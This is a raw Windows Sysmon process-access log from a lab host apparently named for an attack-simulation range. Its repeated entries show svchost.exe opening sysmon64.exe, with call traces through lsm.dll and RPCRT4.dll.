13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 